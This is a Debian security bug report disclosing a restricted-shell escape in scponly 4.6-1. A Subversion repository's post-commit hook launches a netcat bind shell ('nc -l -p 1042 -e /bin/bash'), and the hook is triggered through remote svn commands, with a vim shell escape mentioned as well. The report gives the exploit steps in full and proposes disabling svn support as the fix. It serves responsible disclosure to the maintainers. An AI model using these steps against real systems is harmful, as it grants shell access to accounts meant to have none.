Package: scponly Version: 4.6-1 X-Debbugs-CC: [EMAIL PROTECTED] Severity: grave Tags: security
Hi Thomas Wana,
messing around with some friends here, I tried to access his computer
with only a scponly protected account. I discovered this way of gaining
full shell access:
I locally created a subversion repository /tmp/blubb with
a /tmp/blubb/hooks/post-commit that contains the command:
( nc -l -p 1042 -e /bin/bash) &
I copy this repositry using
scp -r /tmp/blubb/ [EMAIL PROTECTED]:
Then I check out the repository remotely:
ssh [EMAIL PROTECTED] /usr/bin/svn co file:///home/user/blubb bla
Now I add a file and commit it:
touch blah
scp blah [EMAIL PROTECTED]:bla/
ssh [EMAIL PROTECTED] /usr/bin/svn ci bla
At this point, I have a vim instance running, asking me for the commit
message. I could now just run
:!/bin/bash
to get a shell, but having done the post-commit hook already, I want to
use that, so I write something and quit the editor with :x
At this point, I can use
nc host 1042
and I have a shell for the account that should have none.
The solution would be: Do not enable access to svn
(or svnserve), which is a simple compilation option. I’d appreciate it
if this gets fixed in debian etch.
I have sent this information to [EMAIL PROTECTED] and scponly’s
upstream maintainer last week, but have not yet gotten a response.
Greetings,
Joachim
--
Joachim "nomeata" Breitner
Debian Developer
[EMAIL PROTECTED] | ICQ# 74513189 | GPG-Keyid: 4743206C
JID: [EMAIL PROTECTED] | http://people.debian.org/~nomeata
signature.asc
Description: Dies ist ein digital signierter Nachrichtenteil
